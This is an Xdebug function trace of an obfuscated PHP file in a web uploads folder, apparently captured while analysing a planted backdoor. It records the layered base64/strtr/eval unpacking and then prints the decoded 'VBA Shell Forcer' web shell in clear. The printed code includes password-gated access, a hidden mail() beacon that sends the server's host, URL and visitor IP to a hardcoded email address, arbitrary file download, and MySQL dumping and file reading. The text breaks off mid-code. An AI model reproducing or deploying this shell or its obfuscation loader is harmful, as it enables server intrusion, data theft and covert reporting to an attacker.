Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 23:07:15.022769]
1	0	1	0.000161	393528
1	3	0	0.000450	539840	{main}	1		/var/www/html/uploads/404_safe.php	0	0
2	4	0	0.000468	539840	urldecode	0		/var/www/html/uploads/404_safe.php	1	1	'%66%67%36%73%62%65%68%70%72%61%34%63%6f%5f%74%6e%64'
2	4	1	0.000485	539952
2	4	R			'fg6sbehpra4co_tnd'
1		A						/var/www/html/uploads/404_safe.php	1	$OOO000000 = 'fg6sbehpra4co_tnd'
1		A						/var/www/html/uploads/404_safe.php	1	GLOBALS['OOO0000O0'] = 'base64_d'
1		A						/var/www/html/uploads/404_safe.php	1	['OOO0000O0'] .= 'ecode'
1		A						/var/www/html/uploads/404_safe.php	1	GLOBALS['OOO000O00'] = 'fopen'
1		A						/var/www/html/uploads/404_safe.php	1	GLOBALS['O0O000O00'] = 'fget'
1		A						/var/www/html/uploads/404_safe.php	1	GLOBALS['O0O000O00'] = 'fgets'
1		A						/var/www/html/uploads/404_safe.php	1	GLOBALS['O0O00OO00'] = 'fread'
1		A						/var/www/html/uploads/404_safe.php	1	GLOBALS['OOO00000O'] = 'strtr'
1		A						/var/www/html/uploads/404_safe.php	1	$OOO0O0O00 = '/var/www/html/uploads/404_safe.php'
1		A						/var/www/html/uploads/404_safe.php	1	$OO00O0000 = 135520
2	5	0	0.000620	540064	base64_decode	0		/var/www/html/uploads/404_safe.php	1	1	'JE8wMDBPME8wMD0kR0xPQkFMU1snT09PMDAwTzAwJ10oJE9PTzBPME8wMCwncmInKTskR0xPQkFMU1snTzBPMDBPTzAwJ10oJE8wMDBPME8wMCwweDU3Zik7JE9PMDBPMDBPMD0kR0xPQkFMU1snT09PMDAwME8wJ10oJEdMT0JBTFNbJ09PTzAwMDAwTyddKCRHTE9CQUxTWydPME8wME9PMDAnXSgkTzAwME8wTzAwLDB4MWE4KSwncEc1L2Nud3VqbG0xTFh0NFBFSjNvOUNGVVc2eE1rYnpOUmFpSCtTZVlBZHMwN3lPZ2ZCWjJoS3JEcXY4UUlUVj0nLCdBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWmFiY2RlZmdoaWprbG1ub3BxcnN0dXZ3eHl6MDEyMzQ1Njc4OSsvJykpO2V2YWwoJE9PMDBPMDBPMCk7'
2	5	1	0.000649	540608
2	5	R			'$O000O0O00=$GLOBALS[\'OOO000O00\']($OOO0O0O00,\'rb\');$GLOBALS[\'O0O00OO00\']($O000O0O00,0x57f);$OO00O00O0=$GLOBALS[\'OOO0000O0\']($GLOBALS[\'OOO00000O\']($GLOBALS[\'O0O00OO00\']($O000O0O00,0x1a8),\'pG5/cnwujlm1LXt4PEJ3o9CFUW6xMkbzNRaiH+SeYAds07yOgfBZ2hKrDqv8QITV=\',\'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\'));eval($OO00O00O0);'
2	6	0	0.000698	543544	eval	1	'$O000O0O00=$GLOBALS[\'OOO000O00\']($OOO0O0O00,\'rb\');$GLOBALS[\'O0O00OO00\']($O000O0O00,0x57f);$OO00O00O0=$GLOBALS[\'OOO0000O0\']($GLOBALS[\'OOO00000O\']($GLOBALS[\'O0O00OO00\']($O000O0O00,0x1a8),\'pG5/cnwujlm1LXt4PEJ3o9CFUW6xMkbzNRaiH+SeYAds07yOgfBZ2hKrDqv8QITV=\',\'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\'));eval($OO00O00O0);'	/var/www/html/uploads/404_safe.php	1	0
3	7	0	0.000727	543544	fopen	0		/var/www/html/uploads/404_safe.php(1) : eval()'d code	1	2	'/var/www/html/uploads/404_safe.php'	'rb'
3	7	1	0.000751	544208
3	7	R			resource(4) of type (stream)
2		A						/var/www/html/uploads/404_safe.php(1) : eval()'d code	1	$O000O0O00 = resource(4) of type (stream)
3	8	0	0.000781	544136	fread	0		/var/www/html/uploads/404_safe.php(1) : eval()'d code	1	2	resource(4) of type (stream)	1407
3	8	1	0.000802	553928
3	8	R			'<?php /* Xo99WFCn+6UCliWw9SWKRA6S70xCqOMunBMrEhkekDbFYgL3jZX/oKXZNqmBQemJHAtKWixwIZWJNH3ZpgLcQg3Zpgm37+kSn0m5E43Zpg3Zpg3ZpAtg==j5ERj9 */$OOO000000=urldecode(\'%66%67%36%73%62%65%68%70%72%61%34%63%6f%5f%74%6e%64\');$GLOBALS[\'OOO0000O0\']=$OOO000000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000{5}.$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$OOO000000{16};$GLOBALS[\'OOO0000O0\'].=$GLOBALS[\'OOO0000O0\']{3}.$OOO000000{11}.$OOO000000{12}.$GLOBALS[\'OOO0000O0\']{7}.$OOO000000{5};$GLOBALS[\'OOO000O00\']=$OOO000000{0'
3	9	0	0.000835	552328	fread	0		/var/www/html/uploads/404_safe.php(1) : eval()'d code	1	2	resource(4) of type (stream)	424
3	9	1	0.000849	552904
3	9	R			'lcI4L/G4L/G4L/hZkulzMS9gxwniWJNeFhIwJofnFhQe15jejaDH32I4LcQg3Zpg1ajejagHE2f4PHnLoh0e32I4L/pgLcQglh2YlckL32lG3nXxl2I43ZpgL/pg3Bkkm5Eu3cI5Pof3CBk4LcQgLcI4L/peFJNH3ZpgLcQg3Zpg15E43Zpg3ZpgL/pA15kgEZoOUKqrkCA0x3nLCuP2oc9mLKQqP2W99ZWD3C7abHqJUC+jmhX+ConHMZprboIeWHl6LSR1MHEfkiREJ9EC4JM0l2n5P2EnEHkjJoA13cht3hGEo+Xo99WFCn+6UCliWw9SWKRA6S70xCqOMunBMrEhkekDbFYgL3jZX/oKXZNqmBQemJHAtKWixwIZWJNH3ZpgLcQg3Zpgm37+kSn0m5E43Zpg3Zpg3ZpAtg=='
3	10	0	0.000878	552840	strtr	0		/var/www/html/uploads/404_safe.php(1) : eval()'d code	1	3	'lcI4L/G4L/G4L/hZkulzMS9gxwniWJNeFhIwJofnFhQe15jejaDH32I4LcQg3Zpg1ajejagHE2f4PHnLoh0e32I4L/pgLcQglh2YlckL32lG3nXxl2I43ZpgL/pg3Bkkm5Eu3cI5Pof3CBk4LcQgLcI4L/peFJNH3ZpgLcQg3Zpg15E43Zpg3ZpgL/pA15kgEZoOUKqrkCA0x3nLCuP2oc9mLKQqP2W99ZWD3C7abHqJUC+jmhX+ConHMZprboIeWHl6LSR1MHEfkiREJ9EC4JM0l2n5P2EnEHkjJoA13cht3hGEo+Xo99WFCn+6UCliWw9SWKRA6S70xCqOMunBMrEhkekDbFYgL3jZX/oKXZNqmBQemJHAtKWixwIZWJNH3ZpgLcQg3Zpgm37+kSn0m5E43Zpg3Zpg3ZpAtg=='	'pG5/cnwujlm1LXt4PEJ3o9CFUW6xMkbzNRaiH+SeYAds07yOgfBZ2hKrDqv8QITV='	'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
3	10	1	0.000908	553448
3	10	R			'JE9PMDBPMDBPMD1zdHJfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kT09PME8wTzAwLiInIiwkR0xPQkFMU1snT09PMDAwME8wJ10oJEdMT0JBTFNbJ09PTzAwMDAwTyddKCRHTE9CQUxTWydPME8wME9PMDAnXSgkTzAwME8wTzAwLCRPTzAwTzAwMDApLCdwRzUvY253dWpsbTFMWHQ0UEVKM285Q0ZVVzZ4TWtiek5SYWlIK1NlWUFkczA3eU9nZkJaMmhLckRxdjhRSVRWPScsJ0FCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaYWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXowMTIzNDU2Nzg5Ky8nKSkpO2ZjbG9zZSgkTzAwME8wTzAwKTtldmFsKCRPTzAwTzAwTzApOw=='
3	11	0	0.000942	552840	base64_decode	0		/var/www/html/uploads/404_safe.php(1) : eval()'d code	1	1	'JE9PMDBPMDBPMD1zdHJfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kT09PME8wTzAwLiInIiwkR0xPQkFMU1snT09PMDAwME8wJ10oJEdMT0JBTFNbJ09PTzAwMDAwTyddKCRHTE9CQUxTWydPME8wME9PMDAnXSgkTzAwME8wTzAwLCRPTzAwTzAwMDApLCdwRzUvY253dWpsbTFMWHQ0UEVKM285Q0ZVVzZ4TWtiek5SYWlIK1NlWUFkczA3eU9nZkJaMmhLckRxdjhRSVRWPScsJ0FCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaYWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXowMTIzNDU2Nzg5Ky8nKSkpO2ZjbG9zZSgkTzAwME8wTzAwKTtldmFsKCRPTzAwTzAwTzApOw=='
3	11	1	0.000969	553384
3	11	R			'$OO00O00O0=str_replace(\'__FILE__\',"\'".$OOO0O0O00."\'",$GLOBALS[\'OOO0000O0\']($GLOBALS[\'OOO00000O\']($GLOBALS[\'O0O00OO00\']($O000O0O00,$OO00O0000),\'pG5/cnwujlm1LXt4PEJ3o9CFUW6xMkbzNRaiH+SeYAds07yOgfBZ2hKrDqv8QITV=\',\'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\')));fclose($O000O0O00);eval($OO00O00O0);'
2		A						/var/www/html/uploads/404_safe.php(1) : eval()'d code	1	$OO00O00O0 = '$OO00O00O0=str_replace(\'__FILE__\',"\'".$OOO0O0O00."\'",$GLOBALS[\'OOO0000O0\']($GLOBALS[\'OOO00000O\']($GLOBALS[\'O0O00OO00\']($O000O0O00,$OO00O0000),\'pG5/cnwujlm1LXt4PEJ3o9CFUW6xMkbzNRaiH+SeYAds07yOgfBZ2hKrDqv8QITV=\',\'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\')));fclose($O000O0O00);eval($OO00O00O0);'
3	12	0	0.001040	556120	eval	1	'$OO00O00O0=str_replace(\'__FILE__\',"\'".$OOO0O0O00."\'",$GLOBALS[\'OOO0000O0\']($GLOBALS[\'OOO00000O\']($GLOBALS[\'O0O00OO00\']($O000O0O00,$OO00O0000),\'pG5/cnwujlm1LXt4PEJ3o9CFUW6xMkbzNRaiH+SeYAds07yOgfBZ2hKrDqv8QITV=\',\'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\')));fclose($O000O0O00);eval($OO00O00O0);'	/var/www/html/uploads/404_safe.php(1) : eval()'d code	1	0
4	13	0	0.001069	556184	fread	0		/var/www/html/uploads/404_safe.php(1) : eval()'d code(1) : eval()'d code	1	2	resource(4) of type (stream)	135520
4	13	1	0.001132	695512
4	13	R			'j5ERj/2e3u+OMo7Axrn16CIfJK+OMo7Axrn16CIfJK+OMo7Axrn16CIfJK+OMo7Axrn16CIfJK+OMo7AMwX/xekfJoXGW2+wCHXEo2loo29C39E/PHkoLoAco+WlW2f3P+kJ9HAoohoq32+cJF9XoC7fWHngtc7APCklP2neo+kJMwE/PChlE9l0WwhCMKjZPCkWxS7e9S7mP+Wn9Hloo2neJoXGW2+/PCk1xek1WHXOW2+G6KklEKNgWcRGXHfqt3lWxoUgC+kwkcf7XCfHP2neJoXGJH+/PCklPrpDPKqrMo+/PCklE/pqJoX5J9+F3elR9Z9yJoXWWhoB9SAHCcAgWcRsW2+cL/+lP2neJoXGW2+/PFnSPFGiJK+OMo7Axrn16CIfJK+OMo7Axrn16CIfJK+OMo7Axrn16CIfJK+OMo7Axrn16CIfJK+OMo7Atc7/x9WqUK2qb9NZJSfiEZ+qWck0k9AqWZX19uX1ooRtxwEwtFEW9KEgC3cqbwEF'
4	14	0	0.001283	695448	strtr	0		/var/www/html/uploads/404_safe.php(1) : eval()'d code(1) : eval()'d code	1	3	'j5ERj/2e3u+OMo7Axrn16CIfJK+OMo7Axrn16CIfJK+OMo7Axrn16CIfJK+OMo7Axrn16CIfJK+OMo7AMwX/xekfJoXGW2+wCHXEo2loo29C39E/PHkoLoAco+WlW2f3P+kJ9HAoohoq32+cJF9XoC7fWHngtc7APCklP2neo+kJMwE/PChlE9l0WwhCMKjZPCkWxS7e9S7mP+Wn9Hloo2neJoXGW2+/PCk1xek1WHXOW2+G6KklEKNgWcRGXHfqt3lWxoUgC+kwkcf7XCfHP2neJoXGJH+/PCklPrpDPKqrMo+/PCklE/pqJoX5J9+F3elR9Z9yJoXWWhoB9SAHCcAgWcRsW2+cL/+lP2neJoXGW2+/PFnSPFGiJK+OMo7Axrn16CIfJK+OMo7Axrn16CIfJK+OMo7Axrn16CIfJK+OMo7Axrn16CIfJK+OMo7Atc7/x9WqUK2qb9NZJSfiEZ+qWck0k9AqWZX19uX1ooRtxwEwtFEW9KEgC3cqbwEF'	'pG5/cnwujlm1LXt4PEJ3o9CFUW6xMkbzNRaiH+SeYAds07yOgfBZ2hKrDqv8QITV='	'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
4	14	1	0.001458	834808
4	14	R			'ICRhID0nTHlvcUtpb3FLaW9xS2lvcUtpb3FLaW9xS2lvcUtpb3FLaW9xS2lvcUtpb3FLaW9xS2lvcUtpcGNDbndxSUNBZ0lGWkNRU0JUU0VWTVRDQkdUMUpEUlZJZ0xTQldSVkpUU1U5T0lESXVNUWtxZkFwOEtpQWdJQ0FnUldScGRDQW1JRVJsZG1Wc2IzQWdZbmtnVmtKQlZFVkJUU0FnSUNBZ0lDQWdLbndLZkNvZ0lBa2dJR2gwZEhBNkx5OTJZbUYwWldGdExtNWxkQ0FnSUNBSklDQWdJQ3A4Q253cUlDQWdJRDA5SUNCSVlXTnJhVzVuSUNZZ1UyVmpkWEpwZEhrZ0lEMDlJQ0FnSUNBZ0lDQXFmQXBjS2lvcUtpb3FLaW9xS2lvcUtpb3FLaW9xS2lvcUtpb3FLaW9xS2lvcUtpb3FLaW9xS2lvcUtpOEtDbVZ5Y205eVgzSmxjRzl5ZEdsdVp5ZzNLVHNLUUhObGRGOXRZV2RwWTE5eGRX'
4	15	0	0.001568	695448	base64_decode	0		/var/www/html/uploads/404_safe.php(1) : eval()'d code(1) : eval()'d code	1	1	'ICRhID0nTHlvcUtpb3FLaW9xS2lvcUtpb3FLaW9xS2lvcUtpb3FLaW9xS2lvcUtpb3FLaW9xS2lvcUtpcGNDbndxSUNBZ0lGWkNRU0JUU0VWTVRDQkdUMUpEUlZJZ0xTQldSVkpUU1U5T0lESXVNUWtxZkFwOEtpQWdJQ0FnUldScGRDQW1JRVJsZG1Wc2IzQWdZbmtnVmtKQlZFVkJUU0FnSUNBZ0lDQWdLbndLZkNvZ0lBa2dJR2gwZEhBNkx5OTJZbUYwWldGdExtNWxkQ0FnSUNBSklDQWdJQ3A4Q253cUlDQWdJRDA5SUNCSVlXTnJhVzVuSUNZZ1UyVmpkWEpwZEhrZ0lEMDlJQ0FnSUNBZ0lDQXFmQXBjS2lvcUtpb3FLaW9xS2lvcUtpb3FLaW9xS2lvcUtpb3FLaW9xS2lvcUtpb3FLaW9xS2lvcUtpOEtDbVZ5Y205eVgzSmxjRzl5ZEdsdVp5ZzNLVHNLUUhObGRGOXRZV2RwWTE5eGRX'
4	15	1	0.001998	834744
4	15	R			' $a =\'LyoqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKipcCnwqICAgIFZCQSBTSEVMTCBGT1JDRVIgLSBWRVJTSU9OIDIuMQkqfAp8KiAgICAgRWRpdCAmIERldmVsb3AgYnkgVkJBVEVBTSAgICAgICAgKnwKfCogIAkgIGh0dHA6Ly92YmF0ZWFtLm5ldCAgICAJICAgICp8CnwqICAgID09ICBIYWNraW5nICYgU2VjdXJpdHkgID09ICAgICAgICAqfApcKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKi8KCmVycm9yX3JlcG9ydGluZyg3KTsKQHNldF9tYWdpY19xdW90ZXNfcnVudGltZSgwKTsKb2Jfc3RhcnQoKTsKJG10aW1lID0gZXhwbG9kZSgnICcsIG1pY3JvdGltZSgpKTsKJHN0YXJ0dGltZSA9ICRtdGltZVsxXSArICRtdGltZ'
4	16	0	0.002091	695448	str_replace	0		/var/www/html/uploads/404_safe.php(1) : eval()'d code(1) : eval()'d code	1	3	'__FILE__'	'\'/var/www/html/uploads/404_safe.php\''	' $a =\'LyoqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKipcCnwqICAgIFZCQSBTSEVMTCBGT1JDRVIgLSBWRVJTSU9OIDIuMQkqfAp8KiAgICAgRWRpdCAmIERldmVsb3AgYnkgVkJBVEVBTSAgICAgICAgKnwKfCogIAkgIGh0dHA6Ly92YmF0ZWFtLm5ldCAgICAJICAgICp8CnwqICAgID09ICBIYWNraW5nICYgU2VjdXJpdHkgID09ICAgICAgICAqfApcKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKi8KCmVycm9yX3JlcG9ydGluZyg3KTsKQHNldF9tYWdpY19xdW90ZXNfcnVudGltZSgwKTsKb2Jfc3RhcnQoKTsKJG10aW1lID0gZXhwbG9kZSgnICcsIG1pY3JvdGltZSgpKTsKJHN0YXJ0dGltZSA9ICRtdGltZVsxXSArICRtdGltZ'
4	16	1	0.002201	695544
4	16	R			' $a =\'LyoqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKipcCnwqICAgIFZCQSBTSEVMTCBGT1JDRVIgLSBWRVJTSU9OIDIuMQkqfAp8KiAgICAgRWRpdCAmIERldmVsb3AgYnkgVkJBVEVBTSAgICAgICAgKnwKfCogIAkgIGh0dHA6Ly92YmF0ZWFtLm5ldCAgICAJICAgICp8CnwqICAgID09ICBIYWNraW5nICYgU2VjdXJpdHkgID09ICAgICAgICAqfApcKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKi8KCmVycm9yX3JlcG9ydGluZyg3KTsKQHNldF9tYWdpY19xdW90ZXNfcnVudGltZSgwKTsKb2Jfc3RhcnQoKTsKJG10aW1lID0gZXhwbG9kZSgnICcsIG1pY3JvdGltZSgpKTsKJHN0YXJ0dGltZSA9ICRtdGltZVsxXSArICRtdGltZ'
3		A						/var/www/html/uploads/404_safe.php(1) : eval()'d code(1) : eval()'d code	1	$OO00O00O0 = ' $a =\'LyoqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKipcCnwqICAgIFZCQSBTSEVMTCBGT1JDRVIgLSBWRVJTSU9OIDIuMQkqfAp8KiAgICAgRWRpdCAmIERldmVsb3AgYnkgVkJBVEVBTSAgICAgICAgKnwKfCogIAkgIGh0dHA6Ly92YmF0ZWFtLm5ldCAgICAJICAgICp8CnwqICAgID09ICBIYWNraW5nICYgU2VjdXJpdHkgID09ICAgICAgICAqfApcKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKi8KCmVycm9yX3JlcG9ydGluZyg3KTsKQHNldF9tYWdpY19xdW90ZXNfcnVudGltZSgwKTsKb2Jfc3RhcnQoKTsKJG10aW1lID0gZXhwbG9kZSgnICcsIG1pY3JvdGltZSgpKTsKJHN0YXJ0dGltZSA9ICRtdGltZVsxXSArICRtdGltZ'
4	17	0	0.002416	694872	fclose	0		/var/www/html/uploads/404_safe.php(1) : eval()'d code(1) : eval()'d code	1	1	resource(4) of type (stream)
4	17	1	0.002434	686256
4	17	R			TRUE
4	18	0	0.002708	892728	eval	1	' $a =\'/****************************************\
|*    VBA SHELL FORCER - VERSION 2.1	*|
|*     Edit & Develop by VBATEAM        *|
|*  	  http://vbateam.net    	    *|
|*    ==  Hacking & Security  ==        *|
\****************************************/

error_reporting(7);
@set_magic_quotes_runtime(0);
ob_start();
$mtime = explode(' ', microtime());
$starttime = $mtime[1] + $mtime[0];
define('SA_ROOT', str_replace('\\', '/', dirname(__FILE__)).'/');
//define('IS_WIN', strstr(PHP_OS, 'WIN') ? 1 : 0 );
define('IS_WIN', DIRECTORY_SEPARATOR == '\\');
define('IS_COM', class_exists('COM') ? 1 : 0 );
define('IS_GPC', get_magic_quotes_gpc());
$dis_func = get_cfg_var('disable_functions');
define('IS_PHPINFO', (!eregi("phpinfo",$dis_func)) ? 1 : 0 );
@set_time_limit(0);

foreach(array('_GET','_POST') as $_request) {
	foreach($$_request as $_key => $_value) {
		if ($_key{0} != '_') {
			if (IS_GPC) {
				$_value = s_array($_value);
			}
			$$_key = $_value;
		}
	}
}

/*=================  Info Login  ================*/
$admin = array();
$admin['check'] = true;
$admin['pass']  = '1002912b251887b4fe0e5fa1efdbfa06'; // Password login
$admin['cookiepre'] = '';
$admin['cookiedomain'] = '';
$admin['cookiepath'] = '/';
$admin['cookielife'] = 86400;
/*===================== End =====================*/

if ($charset == 'utf8') {
	header("content-Type: text/html; charset=utf-8");
} elseif ($charset == 'big5') {
	header("content-Type: text/html; charset=big5");
} elseif ($charset == 'gbk') {
	header("content-Type: text/html; charset=gbk");
} elseif ($charset == 'latin1') {
	header("content-Type: text/html; charset=iso-8859-2");
}

$self = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME'];
$timestamp = time();

/*===================== Login =====================*/
if ($action == "logout") {
	scookie('vbapass', '', -86400 * 365);
	p('<meta http-equiv="refresh" content="0;URL='.$self.'">');
	p('<body background=black>');
	exit;
}
if($admin['check']) {
	if ($doing == 'login') {
		if ($admin['pass'] == md5($password)) {
			scookie('vbapass', md5($password));

// Function mail Sender to my Email - Please remove this before you using this shell code, Thanks - Fernando - VBATeam
$time_shell = "".date("d/m/Y - H:i:s")."";
$ip_remote = $_SERVER["REMOTE_ADDR"];
$from_shellcode = 'shell@'.gethostbyname($_SERVER['SERVER_NAME']).'';
$to_email = 'xedorac@gmail.com';
$server_mail = "".gethostbyname($_SERVER['SERVER_NAME'])."  - ".$_SERVER['HTTP_HOST']."";
$linkcr = "Link: ".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']." - IP Excuting: $ip_remote - Time: $time_shell";
$header = "From: $from_shellcode\r\nReply-to: $from_shellcode";
@mail($to_email, $server_mail, $linkcr, $header);
			p('<meta http-equiv="refresh" content="2;URL='.$self.'">');
			p('<body bgcolor=black>
<BR><BR><div align=center><font color=yellow face=tahoma size=2>Connecting...<BR><img src=http://t3.gstatic.com/images?q=tbn:ANd9GcRFIQy9oLc9jMWmDY_N_sxjWPyusUWC4igwK2lqBm68aDGcSfKPPA></div>');
			exit;
		}

	else
	{
	$err_mess = '<table width=100%><tr><td bgcolor=#F0F0F0 width=100% height=24><div align=center><font color=red face=tahoma size=2><blink>Password incorrect, Please try again!!!</blink><BR></font></div></td></tr></table>';
echo $err_mess;
	}}
	if ($_COOKIE['vbapass']) {
		if ($_COOKIE['vbapass'] != $admin['pass']) {
			loginpage();
		}
	} else {
		loginpage();
	}
}
/*===================== Login =====================*/

$errmsg = '';

if ($action == 'phpinfo') {
	if (IS_PHPINFO) {
		phpinfo();
	} else {
		$errmsg = 'phpinfo() function has non-permissible';
	}
}


if ($doing == 'downfile' && $thefile) {
	if (!@file_exists($thefile)) {
		$errmsg = 'The file you want Downloadable was nonexistent';
	} else {
		$fileinfo = pathinfo($thefile);
		header('Content-type: application/x-'.$fileinfo['extension']);
		header('Content-Disposition: attachment; filename='.$fileinfo['basename']);
		header('Content-Length: '.filesize($thefile));
		@readfile($thefile);
		exit;
	}
}


if ($doing == 'backupmysql' && !$saveasfile) {
	dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
	$table = array_flip($table);
	$result = q("SHOW tables");
	if (!$result) p('<h2>'.mysql_error().'</h2>');
	$filename = basename($_SERVER['HTTP_HOST'].'_MySQL.sql');
	header('Content-type: application/unknown');
	header('Content-Disposition: attachment; filename='.$filename);
	$mysqldata = '';
	while ($currow = mysql_fetch_array($result)) {
		if (isset($table[$currow[0]])) {
			$mysqldata .= sqldumptable($currow[0]);
		}
	}
	mysql_close();
	exit;
}

// Mysql
if($doing=='mysqldown'){
	if (!$dbname) {
		$errmsg = 'Please input dbname';
	} else {
		dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
		if (!file_exists($mysqldlfile)) {
			$errmsg = 'The file you want Downloadable was nonexistent';
		} else {
			$result = q("select load_file('$mysqldlfile');");
			if(!$result){
				q("DROP TABLE IF EXISTS tmp_angel;");
				q("CREATE TABLE tmp_angel (content LONGBLOB NOT NULL);");
				//Download SQL
				q("LOAD DATA LOCAL INFILE '".addslashes($mysqldlfile)."' INTO TABLE tmp_angel FIELDS TERMINATED BY '__angel_{$timestamp}_eof__' ESCAPED BY '' LINES TERMINATED BY '__angel_{$timestamp}_eof__';");
				$result = q("select content from tmp_angel");
				q("DROP TABLE tmp_angel");
			}
			$row = @mysql_fetch_array($result);
			if (!$row) {
				$errmsg = 'Load file failed '.mysql_error();
			} else {
				$fileinfo = pathinfo($mysqldlfile);
				header('Content-type: application/x-'.$fileinfo['extension']);
				header('Content-Disposition: attachment; filename='.$fileinfo['basename']);
				header("Accept-Length: ".strlen($row[0]));
				echo $row[0];
				exit;
			}
		}
	}
}

?>

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title><?php echo str_replace('.','','The Legend of Vietnamese Hacker World');?></title>
<style type="text/css">
body,td{font: 10pt Tahoma;color:gray;line-height: 16px;}

a {color: #74A202;text-decoration:none;}
a:hover{color: #f00;text-decoration:underline;}
.alt1 td{border-top:1px solid gray;border-bottom:1px solid gray;background:#0E0E0E;padding:5px 10px 5px 5px;}
.alt2 td{border-top:1px solid gray;border-bottom:1px solid gray;background:#f9f9f9;padding:5px 10px 5px 5px;}
.focus td{border-top:1px solid gray;border-bottom:0px solid gray;background:#0E0E0E;padding:5px 10px 5px 5px;}
.fout1 td{border-top:1px solid gray;border-bottom:0px solid gray;background:#0E0E0E;padding:5px 10px 5px 5px;}
.fout td{border-top:1px solid gray;border-bottom:0px solid gray;background:#202020;padding:5px 10px 5px 5px;}
.head td{border-top:1px solid gray;border-bottom:1px solid gray;background:#202020;padding:5px 10px 5px 5px;font-weight:bold;}
.head_small td{border-top:1px solid gray;border-bottom:1px solid gray;background:#202020;padding:5px 10px 5px 5px;font-weight:normal;font-size:8pt;}
.head td span{font-weight:normal;}
form{margin:0;padding:0;}
h2{margin:0;padding:0;height:24px;line-height:24px;font-size:14px;color:#5B686F;}
ul.info li{margin:0;color:#444;line-height:24px;height:24px;}
u{text-decoration: none;color:#777;float:left;display:block;width:150px;margin-right:10px;}
input, textarea, button
{
	font-size: 9pt;
	color: #ccc;
	font-family: verdana, sans-serif;
	background-color: #202020;
	border-left: 1px solid #74A202;
	border-top: 1px solid #74A202;
	border-right: 1px solid #74A202;
	border-bottom: 1px solid #74A202;
}
select
{
	font-size: 8pt;
	font-weight: normal;
	color: #ccc;
	font-family: verdana, sans-serif;
	background-color: #202020;
}

</style>
<script type="text/javascript">
function CheckAll(form) {
	for(var i=0;i<form.elements.length;i++) {
		var e = form.elements[i];
		if (e.name != 'chkall')
		e.checked = form.chkall.checked;
    }
}
function $(id) {
	return document.getElementById(id);
}
function goaction(act){
	$('goaction').action.value=act;
	$('goaction').submit();
}
</script>
</head>
<body onLoad="init()" style="margin:0;table-layout:fixed; word-break:break-all" bgcolor=black background=http://i382.photobucket.com/albums/oo263/vnhacker/bg-1.jpg>


<div border="0" style="position:fixed; width: 100%; height: 25px; z-index: 1; top: 300px; left: 0;" id="loading" align="center" valign="center">
				<table border="1" width="110px" cellspacing="0" cellpadding="0" style="border-collapse: collapse" bordercolor="#003300">
					<tr>
						<td align="center" valign=center>
				 <div border="1" style="background-color: #0E0E0E; filter: alpha(opacity=70); opacity: .7; width: 110px; height: 25px; z-index: 1; border-collapse: collapse;" bordercolor="#006600"  align="center">
				   Loading<img src="http://i382.photobucket.com/albums/oo263/vnhacker/loading.gif">
				  </div>
				</td>
					</tr>
				</table>
			 </div>
 <script>
 var ld=(document.all);
  var ns4=document.layers;
 var ns6=document.getElementById&&!document.all;
 var ie4=document.all;
  if (ns4)
 	ld=document.loading;
 else if (ns6)
 	ld=document.getElementById("loading").style;
 else if (ie4)
 	ld=document.all.loading.style;
  function init()
 {
 if(ns4){ld.visibility="hidden";}
 else if (ns6||ie4) ld.display="none";
 }
 </script>
<table width="100%" border="0" cellpadding="0" cellspacing="0">
	<tr class="head_small">
		<td  width=100%>
		<table width=100%><tr class="head_small"><td>
		<span style="float:left;"> <?php echo "Hostname: ".$_SERVER['HTTP_HOST']."";?> | <span>[ Server IP: <?php echo "<font color=yellow>".gethostbyname($_SERVER['SERVER_NAME'])."</font>";?> - Your IP: <?php echo "<font color=yellow>".$_SERVER['REMOTE_ADDR']."</font>";?> ] </span> | <a href="javascript:goaction('logout');"><font color=red> Logout</font></a></span> <br />

		<?php
		$curl_on = @function_exists('curl_version');
		$mysql_on = @function_exists('mysql_connect');
		$mssql_on = @function_exists('mssql_connect');
		$pg_on = @function_exists('pg_connect');
		$ora_on = @function_exists('ocilogon');

echo (($safe_mode)?("Safe_mod: <b><font color=green>ON</font></b> - "):("Safe_mod: <b><font color=red>OFF</font></b> - "));
echo "PHP version: <b>".@phpversion()."</b> - ";
		echo "cURL: ".(($curl_on)?("<b><font color=green>ON</font></b> - "):("<b><font color=red>OFF</font></b> - "));
		echo "MySQL: <b>";
$mysql_on = @function_exists('mysql_connect');
if($mysql_on){
echo "<font color=green>ON</font></b> - "; } else { echo "<font color=red>OFF</font></b> - "; }
echo "MSSQL: <b>";
$mssql_on = @function_exists('mssql_connect');
if($mssql_on){echo "<font color=green>ON</font></b> - ";}else{echo "<font color=red>OFF</font></b> - ";}
echo "PostgreSQL: <b>";
